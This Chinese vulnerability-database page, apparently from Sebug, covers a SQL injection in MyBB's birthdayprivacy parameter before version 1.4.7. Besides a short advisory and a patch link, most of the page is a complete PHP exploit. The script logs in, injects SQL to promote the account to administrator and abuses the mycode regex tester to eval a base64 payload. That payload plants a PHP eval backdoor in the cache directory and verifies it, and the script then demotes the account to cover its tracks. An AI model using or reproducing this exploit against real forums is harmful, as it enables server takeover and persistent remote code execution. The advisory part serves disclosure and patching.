MyBB birthdayprivacy参数SQL注入漏洞
影响版本:
MyBB < 1.4.7漏洞描述:
BUGTRAQ ID: 35458
MyBB是一款流行的Web论坛程序。
MyBB没有正确地验证用户请求中提交给inc/datahandlers/user.php模块的birthdayprivacy参数,远程安全者可以通过向论坛提交恶意请求执行SQL注入安全,导致获得论坛的管理权限。成功利用这个漏洞要求打开了Mybb的不可视模式且拥有有效的登录凭据。<*参考
http://milw0rm.com/exploits/9001
http://secunia.com/advisories/35517/
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!<?PHP
mybb = new maibibi2;
class maibibi2
{
function __construct ()
{
this->user = this->get_argv('-u');
this->pass = this->get_argv('-p');
this->target = this->get_argv('-t');
this->admindir = this->get_argv('--admindir');
this->oa2u = this->get_argv('--onlyadmin2user');
this->ip = '67.167.124.135';
this->ua = 'Mozilla 5.0';
this->bckdr = '/cache/themes/themes.php';
if (this->get_argv('--help') !== False || this->get_argv('-h') !== False) this->help();
if (!this->user || !this->pass) die ("You have to insert User/Password/r/nUse --help or -h for more informations./r/n");
if (!this->target) die ("You have to insert Target/r/nUse --help or -h for more informations./r/n");
this->http();
this->init();
}
function help ()
{
die ("Under Construction/r/n");
}
function get_argv (what)
{
global argv;
if (!n = array_search(what, argv)) return False;
return argv[n+1];
}
function init ()
{
set_time_limit(0); // about 30 seconds left? Be serious.
echo "[.] Initialing./r/n";
if (!this->mybbuser = this->ilovecookies ()) die ("Incorrect credentials./r/n");
echo "[+] Logged in./r/n";
if (!this->mypostkey = this->getmypostkey()) die ("My_Post_Key Not Found./r/n");
echo "[+] my_post_key variable found./r/n";
this->hidemefromonlinelist();
echo "[+] Turned On mybb's invisible mode./r/n";
this->user2admin();
echo "[+] Sql code injected. You're now admin./r/n";
if (!this->admindir && !this->admindir = this->findadmindir()) die ("Unable to find admin Dir./r/nWhatever it's possible your user is currently an administrator./r/nIf you know admin dir path, you may use --admindir/r/n");
echo "[+] Admindir found (or --admindir is used): {this->admindir}./r/n";
if (!this->adminsid = this->loginadmin()) die ("[-] Unable to login as admin./r/nWhatever it's possible your user is currently an administrator./r/n");
echo "[+] Admin sid Found: {this->adminsid}/r/n";
#this->writabledirs();
this->rce ();
if (!this->checkrce ()) die ("Unable to Execute PHP Code./r/nWhatever it's possible your user is currently an administrator./r/n");
echo "[+] Site correctly backdoored./r/n";
this->admin2user();
echo "[+] Sql code injected. You're now user./r/n";
echo "[+] Backdoor URI: {this->target}{this->bckdr}/r/n";
echo "All Done. The:Paradox hopes you used this exploit exclusively for your own fun and you enjoyed it./r/nHave a nice day :P/r/n/r/n";
}
function ilovecookies ()
{
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua);
this->postdata = array ('username' => this->user, 'password' => this->pass, 'submit' => 'Login', 'action' => 'do_login');
rsp = this->post ("{this->target}/member.php");
if (!preg_match_all ('~mybbuser=(.+?);~',rsp,res)) return False;
return res[1][0];
}
function getmypostkey ()
{
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua, 'Referer' => "{this->target}/member.php", 'Cookie' => "mybbuser={this->mybbuser};");
rsp = this->get ("{this->target}/usercp.php?action=profile");
if (!preg_match_all ('~name="my_post_key" value="(.+?)" />~',rsp,res)) return False;
return res[1][0];
}
function hidemefromonlinelist()
{
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua, 'Referer' => "{this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={this->mybbuser};");
this->postdata = array ('my_post_key' => this->mypostkey, 'invisible' => '1', 'action' => 'do_options', 'regsubmit' => 'Update+Options');
rsp = this->post ("{this->target}/member.php");
}
function user2admin ()
{
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua, 'Referer' => "{this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={this->mybbuser};");
this->postdata = array ('my_post_key' => this->mypostkey,
'invisible' => '1',
'bday1' => '',
'bday2' => '',
'bday3' => '',
'website' => 'http%3A%2F%2F',
'profile_fields%5Bfid3%5D' => 'Undisclosed',
'profile_fields%5Bfid2%5D' => 'Undisclosed',
'profile_fields%5Bfid1%5D' => 'Undisclosed',
'usertitle' => '',
'icq' => '',
'aim' => '',
'msn' => '',
'yahoo' => '',
'away' => '0',
'awayreason' => '',
'awayday' => '',
'awaymonth' => '',
'awayyear' => '',
'birthdayprivacy' => "all', usergroup=4, email='pr3sident@whit3house.gov',regip='79.140.81.83', longregip='1334595923', lastip='', longlastip='",
'action' => 'do_profile',
'regsubmit' => '1');
rsp = this->post ("{this->target}/usercp.php");
}
function findadmindir ()
{
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua, 'Referer' => "{this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={this->mybbuser};");
rsp = this->get("{this->target}/index.php");
if (!preg_match_all ("~<!-- start: header_welcomeblock_member_admin -->
— <a href=/"{this->target}(.+?)/index.php/">~",rsp,res)) return False;
return res[1][0];
}
function loginadmin ()
{
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua, 'Referer' => "{this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={this->mybbuser};");
this->postdata = array ('username' => this->user, 'password' => this->pass, 'do' => 'login');
rsp = this->post ("{this->target}/{this->admindir}/index.php");
if (!preg_match_all ('~adminsid=(.+?);~',rsp,res)) return False;
return res[1][0];
}
function writabledirs ()
{
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua, 'Referer' => "{this->target}/{this->admindir}/index.php?", 'Cookie' => "mybbuser={this->mybbuser}; adminsid={this->adminsid};");
this->get ("{this->target}/{this->admindir}/index.php?module=tools") ;
}
function rceOld ()
{
//edits inc/functions.php (original one)
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua, 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "{this->target}/{this->admindir}/index.php?module=config/mycode&action=edit&cid=1", 'Cookie' => "mybbuser={this->mybbuser}; adminsid={this->adminsid};");
this->postdata = array ('my_post_key' => this->mypostkey,
'o_o' => 'phpinfo();',
'regex' => '(.*%3F)#e%00',
'replacement' => 'die(eval(stripslashes(_REQUEST[/'o_o/'])));',
'test_value' => 'XoD');
rsp = this->post ("{this->target}/{this->admindir}/index.php?module=config/mycode&action=xmlhttp_test_mycode");
}
function rce ()
{
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua, 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "{this->target}/{this->admindir}/index.php?module=config/mycode&action=edit&cid=1", 'Cookie' => "mybbuser={this->mybbuser}; adminsid={this->adminsid};");
this->postdata = array ('my_post_key' => this->mypostkey,
'o_o' => 'JGZwID0gZm9wZW4oJF9SRVFVRVNUWydmaWxlJ10sICdhJyk7DQpmd3JpdGUoJGZwLCAnPD9QSFAgaWYgKGlzc2V0KCRfUkVRVUVTVFt4XSkpIGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFt4XSkpOyA/PicpOw0KZmNsb3NlKCRmcCk7',
'regex' => '(.*%3F)#e%00',
'replacement' => 'die(eval(base64_decode(_REQUEST[/'o_o/'])));',
'test_value' => 'XoD',
'file' => "../{this->bckdr}");
rsp = this->post ("{this->target}/{this->admindir}/index.php?module=config/mycode&action=xmlhttp_test_mycode");
}
function admin2user ()
{
this->header = array ('client-ip' => this->ip ,'User-Agent' => this->ua, 'Referer' => "{this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={this->mybbuser};");
this->postdata = array ('my_post_key' => this->mypostkey,
'invisible' => '1',
'bday1' => '',
'bday2' => '',
'bday3' => '',
'website' => 'http%3A%2F%2F',
'profile_fields%5Bfid3%5D' => 'Undisclosed',
'profile_fields%5Bfid2%5D' => 'Undisclosed',
'profile_fields%5Bfid1%5D' => 'Undisclosed',
'usertitle' => '',
'icq' => '',
'aim' => '',
'msn' => '',
'yahoo' => '',
'away' => '0',
'awayreason' => '',
'awayday' => '',
'awaymonth' => '',
'awayyear' => '',
'birthdayprivacy' => "all', usergroup=2, email='pr3sident.whit3house@gmail.com',regip='79.140.81.83', longregip='1334595923', lastip='', longlastip='",
'action' => 'do_profile',
'regsubmit' => '1');
rsp = this->post ("{this->target}/usercp.php");
}
function checkrce_old ()
{
this->header = array ('client-ip' => this->ip ,'Cookie' => 'x=print /'.:31337:./'%3B;');
rsp = this->get ("{this->target}/{this->admindir}/inc/functions.php?");
if (!strstr(rsp,'.:31337:.')) return False;
else return True;
}
function checkrce ()
{
this->header = array ('client-ip' => this->ip ,'Cookie' => 'x=print /'.:31337:./'%3B;');
rsp = this->get ("{this->target}/{this->bckdr}");
if (!strstr(rsp,'.:31337:.')) return False;
else return True;
}
function http (port = 80, header = array(), post = array(), timeout = 30)
{
this->port = port;
this->timeout = timeout;
this->header = header;
this->postdata = post;
}
function get (url)
{
this->url = parse_url(url);
this->packet = array();
this->packet[] = "GET {this->url['path']}?{this->url['query']}{this->url['fragment']} HTTP/1.1";
this->packet[] = "Host: {this->url['host']}";
foreach (this->header as header => value)
{
this->packet[] = "header: value";
}
this->packet[] = "/r/n/r/n";
this->packet = implode ("/r/n",this->packet);
return this->conn();
}
function post (url)
{
this->url = parse_url(url);
this->packet = array();
this->postcontent = '';
this->packet[] = "POST {this->url['path']}?{this->url['query']}{this->url['fragment']} HTTP/1.1";
this->packet[] = "Host: {this->url['host']}";
foreach (this->header as header => value)
{
this->packet[] = "header: value";
}
foreach (this->postdata as post => value)
{
if (this->postcontent != '') this->postcontent .= '&';
this->postcontent .= "post=value";
}
this->packet[] = 'Content-Type: application/x-www-form-urlencoded';
this->packet[] = "Content-Length: ".strlen(this->postcontent)."/r/n";
this->packet[] = this->postcontent;
this->packet = implode ("/r/n",this->packet);
return this->conn();
}
function conn()
{
if (!isset(this->url['port'])) this->url['port'] = this->port;
sk = fsockopen (this->url['host'], this->url['port'], eno, estr, this->timeout);
if (!is_resource(sk)) return "[-] Fsockopen Failed! Error: ".estr." [".eno."]" ;
else {
fputs(sk, this->packet);
rsp = "";
while (!feof(sk))
{
rsp .= fgets (sk, 1024);
}
}
fclose(sk);
return rsp;
}
}
?>SEBUG安全建议:
厂商补丁:
MyBB
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://blog.mybboard.net/2009/06/15/mybb-147-released-security-update/
